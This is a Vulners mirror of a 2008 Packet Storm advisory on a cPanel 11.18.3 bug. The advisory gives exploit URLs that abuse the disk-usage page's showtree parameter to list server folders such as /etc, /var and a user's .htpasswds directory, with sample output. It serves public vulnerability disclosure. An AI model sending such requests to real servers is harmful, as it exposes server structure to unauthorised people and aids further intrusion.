Lucene search
K

cpanel-folder.txt

🗓️ 19 Mar 2008 00:00:00Reported by Linux_DroxType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

New bug discovered in cPanel version 11.18.3 allows viewing of specific folders on the serve

Code
`Hello  
  
I Discovered a new bug to show the directions ( Folders Only ) on the server  
  
for example , i tried to see the folders in /etc  
  
and it worked !  
  
Exploit :  
  
http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/etc  
  
now you will see the folders only which is inside /etc  
exapmle :  
  
Directory Space Used   
etc/Pegasus 0.00 Meg   
etc/X11 0.07 Meg   
etc/X11/applnk 0.00 Meg   
etc/X11/fs 0.00 Meg   
etc/X11/serverconfig 0.00 Meg   
etc/X11/starthere 0.03 Meg   
etc/X11/sysconfig 0.00 Meg  
  
...etc  
  
other example to see the folders in /var :  
  
http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/var  
  
  
that will shows you folders inside /var , like :  
var/www/cgi-bin 0.00 Meg   
var/www/error 0.19 Meg   
var/www/error/include 0.01 Meg   
  
var/www/html 0.00 Meg   
var/www/icons 0.89 Meg   
var/www/icons/small 0.25 Meg   
  
  
var/yp 0.02 Meg   
var/yp/binding 0.00 Meg   
  
...etc  
  
another example, you can see the folders which is been protected by firewall  
for example if you type :  
  
http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/home/user/.htpasswds  
  
u will see all the folders which got firewall  
  
like :  
home/user/.htpasswds/public_html 0.01 Meg   
home/user/.htpasswds/public_html/admin 0.00 Meg   
home/user/.htpasswds/public_html/admin/login 0.00 Meg   
  
  
  
tested on / cPanel version 11.18.3  
  
  
Discovered By Linux_Drox  
  
Best Regards  
  
L-G-H TEAM  
LeZr.Com   
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Mar 2008 00:00Current
7.4High risk
Vulners AI Score7.4
24